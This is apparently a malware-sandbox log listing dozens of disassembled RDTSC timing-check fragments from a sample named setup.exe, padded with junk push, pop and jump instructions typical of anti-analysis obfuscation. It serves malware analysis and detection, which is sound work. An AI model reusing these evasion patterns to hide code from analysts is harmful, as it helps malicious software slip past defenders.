                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110187 second address: 5110197 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A27Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100042 second address: 5100056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC169461AA0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100056 second address: 5100128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e movsx ebx, ax 0x00000011 mov ebx, eax 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FC16945A27Ah 0x0000001a jmp 00007FC16945A285h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FC16945A27Ch 0x00000029 adc cx, B4C8h 0x0000002e jmp 00007FC16945A27Bh 0x00000033 popfd 0x00000034 pushfd 0x00000035 jmp 00007FC16945A288h 0x0000003a add ah, 00000028h 0x0000003d jmp 00007FC16945A27Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov ebp, esp 0x00000046 pushad 0x00000047 call 00007FC16945A280h 0x0000004c mov bh, ah 0x0000004e pop edi 0x0000004f popad 0x00000050 pop ebp 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 pushfd 0x00000055 jmp 00007FC16945A27Fh 0x0000005a add si, CDCEh 0x0000005f jmp 00007FC16945A289h 0x00000064 popfd 0x00000065 push eax 0x00000066 pop edi 0x00000067 popad 0x00000068 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100128 second address: 5100144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC169461AA8h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5130B1A second address: 5130B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC16945A27Ch 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D00DF second address: 50D012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1C78C7E3h 0x00000008 pushfd 0x00000009 jmp 00007FC169461AA8h 0x0000000e xor ecx, 5E5AB828h 0x00000014 jmp 00007FC169461A9Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC169461AA5h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D012D second address: 50D0133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0133 second address: 50D0137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D0137 second address: 50D013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D013B second address: 50D0189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b mov bh, 9Eh 0x0000000d pop ecx 0x0000000e push ebx 0x0000000f pushfd 0x00000010 jmp 00007FC169461AA8h 0x00000015 adc cl, 00000018h 0x00000018 jmp 00007FC169461A9Bh 0x0000001d popfd 0x0000001e pop esi 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC169461AA2h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50D025E second address: 50D0264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0D04 second address: 50F0D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 18h 0x00000005 mov cx, 6ADFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FC169461AA2h 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushfd 0x00000017 jmp 00007FC169461AA7h 0x0000001c and esi, 00E9778Eh 0x00000022 jmp 00007FC169461AA9h 0x00000027 popfd 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0D5F second address: 50F0D7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC16945A280h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0D7D second address: 50F0D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0843 second address: 50F0859 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A282h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0859 second address: 50F0892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FC169461AA7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC169461AA5h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0892 second address: 50F0898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0898 second address: 50F089C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F089C second address: 50F08A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0712 second address: 50F07D7 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC169461AA9h 0x00000008 and al, 00000006h 0x0000000b jmp 00007FC169461AA1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FC169461A9Eh 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC169461AA1h 0x00000022 sub cx, 4216h 0x00000027 jmp 00007FC169461AA1h 0x0000002c popfd 0x0000002d movzx ecx, bx 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FC169461AA9h 0x00000039 adc ah, 00000026h 0x0000003c jmp 00007FC169461AA1h 0x00000041 popfd 0x00000042 mov cx, A357h 0x00000046 popad 0x00000047 mov ebp, esp 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FC169461AA9h 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F07D7 second address: 50F07DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F07DD second address: 50F07E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F04E3 second address: 50F0553 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC16945A282h 0x00000009 sbb eax, 24EDE2A8h 0x0000000f jmp 00007FC16945A27Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a pushad 0x0000001b call 00007FC16945A285h 0x00000020 pop ecx 0x00000021 mov di, 39B4h 0x00000025 popad 0x00000026 jmp 00007FC16945A27Dh 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 call 00007FC16945A283h 0x00000035 pop ecx 0x00000036 popad 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100415 second address: 510041B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 510041B second address: 510041F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 510041F second address: 510048D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FC169461AA6h 0x00000011 push eax 0x00000012 jmp 00007FC169461A9Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FC169461AA6h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC169461AA7h 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 510048D second address: 5100493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100493 second address: 5100497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5130AA2 second address: 5130AA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110596 second address: 51105BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51105BA second address: 51105BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51105BE second address: 51105C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51105C4 second address: 51105C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51105C9 second address: 51105ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 76A4h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461AA6h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51105ED second address: 511061F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov di, cx 0x0000000f jmp 00007FC16945A280h 0x00000014 popad 0x00000015 mov eax, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 movzx ecx, di 0x0000001c push eax 0x0000001d push edx 0x0000001e movsx ebx, si 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 511061F second address: 511062D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 and dword ptr [eax], 00000000h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 511062D second address: 5110645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A284h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110645 second address: 511064B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 511064B second address: 511064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 511064F second address: 5110661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110661 second address: 5110673 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110673 second address: 5110679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110679 second address: 511067D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F062F second address: 50F0640 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 538E5431h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0640 second address: 50F0655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FC16945A27Fh 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0655 second address: 50F0665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cx, BF11h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F0665 second address: 50F06DF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC16945A286h 0x00000008 xor eax, 52771D98h 0x0000000e jmp 00007FC16945A27Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007FC16945A288h 0x0000001b mov bx, si 0x0000001e pop esi 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 push ebx 0x00000023 call 00007FC16945A286h 0x00000028 pop ecx 0x00000029 pop ebx 0x0000002a movzx ecx, di 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 mov bx, D79Ch 0x00000035 movsx edx, cx 0x00000038 popad 0x00000039 pop ebp 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50F06DF second address: 50F06E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51100C6 second address: 51100CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51100CC second address: 51100D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51100D0 second address: 51100D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51100D4 second address: 51100FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC169461A9Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC169461A9Ah 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51100FA second address: 51100FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51100FE second address: 5110104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5110104 second address: 511010A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51301FD second address: 513020B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 513020B second address: 513020F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 513020F second address: 5130215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5130215 second address: 513025A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A286h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FC16945A280h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov cx, 581Dh 0x00000018 mov ebx, ecx 0x0000001a popad 0x0000001b xchg eax, ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC16945A27Bh 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 513025A second address: 513026B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 push ecx 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 513026B second address: 513026F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 513026F second address: 5130275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5130275 second address: 5130285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A27Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5130285 second address: 5130289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5130289 second address: 51302BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC16945A27Dh 0x00000010 adc si, FD76h 0x00000015 jmp 00007FC16945A281h 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51302BC second address: 5130314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [76FB65FCh] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC169461A9Fh 0x00000011 or al, FFFFFFAEh 0x00000014 jmp 00007FC169461AA9h 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FC169461A9Eh 0x00000022 and ch, 00000028h 0x00000025 jmp 00007FC169461A9Bh 0x0000002a popfd 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5130314 second address: 513036C instructions: 0x00000000 rdtsc 0x00000002 call 00007FC16945A288h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b test eax, eax 0x0000000d jmp 00007FC16945A281h 0x00000012 je 00007FC1DB25D897h 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FC16945A27Ch 0x0000001f xor cl, FFFFFFE8h 0x00000022 jmp 00007FC16945A27Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a mov ebx, eax 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 513036C second address: 5130391 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ecx, eax 0x0000000a pushad 0x0000000b jmp 00007FC169461A9Ah 0x00000010 mov ch, 05h 0x00000012 popad 0x00000013 xor eax, dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov di, F4EAh 0x0000001d mov ecx, edx 0x0000001f popad 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5130391 second address: 51303A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ah 0x00000005 mov cx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51303A4 second address: 51303EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FC169461A9Fh 0x0000000c sub esi, 2D0DE2EEh 0x00000012 jmp 00007FC169461AA9h 0x00000017 popfd 0x00000018 popad 0x00000019 ror eax, cl 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC169461A9Dh 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51303EC second address: 51303F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51303F2 second address: 51303F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51303F6 second address: 5130405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5130405 second address: 5130409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5130409 second address: 513040F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0030 second address: 50E005A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d jmp 00007FC169461AA5h 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E005A second address: 50E005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E005E second address: 50E0071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0071 second address: 50E0077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 50E0077 second address: 50E00C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e jmp 00007FC169461AA6h 0x00000013 xchg eax, ecx 0x00000014 pushad 0x00000015 mov si, C57Dh 0x00000019 push eax 0x0000001a pop edx 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007FC169461AA3h 0x00000025 pop ecx 0x00000026 popad 0x00000027 rdtsc
